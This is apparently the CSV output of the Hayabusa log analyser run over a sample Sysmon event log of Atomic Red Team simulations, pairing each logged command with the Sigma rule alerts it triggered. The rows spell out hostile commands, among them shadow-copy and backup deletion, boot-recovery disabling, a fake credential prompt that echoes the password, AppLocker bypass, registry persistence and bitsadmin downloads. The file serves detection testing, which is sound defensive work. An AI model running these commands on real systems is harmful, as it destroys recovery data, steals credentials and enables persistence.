2019-07-19 23:45:06.213 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.267 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,low,Startup Folder File Write,,rules/sigma/file_event/sysmon_startup_folder_file_write.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,high,PowerShell Writing Startup Shortcuts,,rules/sigma/file_event/sysmon_powershell_startup_shortcuts.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RESBED6.tmp"" ""c:\AtomicRedTeam\CSC5779B24A646D409A951966A058ABC4E3.TMP"" : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:56.033 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""del T1121.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:56.069 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:19.052 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:19.443 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RES1BEA.tmp"" ""c:\AtomicRedTeam\CSC8EBD65DB33242A1BAD76494F485AF42.TMP"" : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"" T1121.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:51.883 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,CurrentControlSet Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentcontrolset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:37.096 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:37.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,New DLL Added to AppInit_DLLs Registry Key,,rules/sigma/registry_event/sysmon_new_dll_added_to_appinit_dlls_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:37.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:40.691 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: vssadmin.exe delete shadows /all /quiet : Path: C:\Windows\System32\vssadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,critical,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:40.863 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wbadmin.exe delete catalog -quiet : Path: C:\Windows\System32\wbadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.773 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wbengine.exe"" : Path: C:\Windows\System32\wbengine.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.958 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\vds.exe : Path: C:\Windows\System32\vds.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:46.112 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:51.816 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures : Path: C:\Windows\System32\bcdedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,high,Modification of Boot Configuration,,rules/sigma/process_creation/win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bcdedit.exe /set {default} recoveryenabled no : Path: C:\Windows\System32\bcdedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,high,Modification of Boot Configuration,,rules/sigma/process_creation/win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:52.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:57.227 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sdelete.exe C:\some\file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:57.274 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:04.103 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:05.365 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /create AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,medium,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
